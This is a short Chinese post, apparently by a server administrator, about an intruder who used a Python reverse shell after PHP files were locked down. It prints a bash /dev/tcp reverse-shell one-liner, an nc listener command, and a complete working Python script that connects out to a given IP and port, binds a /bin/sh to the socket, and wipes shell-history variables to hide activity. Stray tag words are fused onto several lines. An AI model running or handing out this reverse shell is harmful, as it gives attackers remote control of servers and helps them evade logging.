咱們知道,通常的反彈shell php
能夠直接使用 base 反彈html
bash -i >& /dev/tcp/ownip/port 0>&1python
還能夠使用一些簡單的命令 nc nmap 等等。。。。linux
nc -l -p port -vv xxxshell
通過前幾回的攻擊,他也變聰明瞭,知道我針對了php 的文件增強了管控,bash
因此它又有針對性的使用了Linux自帶的Python 進行基於Python的反彈服務器
源碼:socket
# -*- coding:utf-8 -*-
#!/usr/bin/env python
"""
back connect py version,only linux have pty module
code by google security team
"""
import sys,os,socket,pty
shell = "/bin/sh"tcp
def usage(name):
print 'python reverse connector'
print 'usage: %s <ip_addr> <port>' % name函數
def main():
if len(sys.argv) !=3:
usage(sys.argv[0])
sys.exit()
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((sys.argv[1],int(sys.argv[2])))
print 'connect ok'
except:
print 'connect faild'
sys.exit()
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
global shell
os.unsetenv("HISTFILE")
os.unsetenv("HISTFILESIZE")
os.unsetenv("HISTSIZE")
os.unsetenv("HISTORY")
os.unsetenv("HISTSAVE")
os.unsetenv("HISTZONE")
os.unsetenv("HISTLOG")
os.unsetenv("HISTCMD")
os.putenv("HISTFILE",'/dev/null')
os.putenv("HISTSIZE",'0')
os.putenv("HISTFILESIZE",'0')
pty.spawn(shell)
s.close()
if __name__ == '__main__':
main()
很噁心啊 ,能夠看到經過os函數,針對環境變量無限向我服務器上傳參
我查詢資料 還發現 即便你禁全部端口,只開放80 端口,也還能經過Python繞過去TCP。從UDP上去。噁心至極啊!!!
謝邀大神
友情連接: